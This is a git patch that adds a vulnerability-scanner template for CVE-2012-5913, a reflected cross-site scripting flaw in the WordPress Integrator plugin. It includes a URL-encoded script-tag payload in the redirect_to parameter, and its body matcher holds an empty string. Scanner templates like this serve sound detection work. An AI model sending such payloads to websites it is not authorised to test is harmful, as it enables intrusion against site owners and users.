From e2221a68f68126cc9934fb8d00ecd009380d7879 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 14 Jul 2021 00:15:23 +0700 Subject: [PATCH 1/2] Create CVE-2012-5913.yaml --- cves/2012/CVE-2012-5913.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2012/CVE-2012-5913.yaml diff --git a/cves/2012/CVE-2012-5913.yaml b/cves/2012/CVE-2012-5913.yaml new file mode 100644 index 0000000000..3feacd8a7f --- /dev/null +++ b/cves/2012/CVE-2012-5913.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-5913 + +info: + name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 0af70752fcdbda886ce8392f1d02014bd7eaa26f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 14 Jul 2021 19:08:13 +0530 Subject: [PATCH 2/2] Update CVE-2012-5913.yaml --- cves/2012/CVE-2012-5913.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2012/CVE-2012-5913.yaml b/cves/2012/CVE-2012-5913.yaml index 3feacd8a7f..be685d2507 100644 --- a/cves/2012/CVE-2012-5913.yaml +++ b/cves/2012/CVE-2012-5913.yaml @@ -4,6 +4,7 @@ info: name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913 tags: cve,cve2012,wordpress,xss,wp-plugin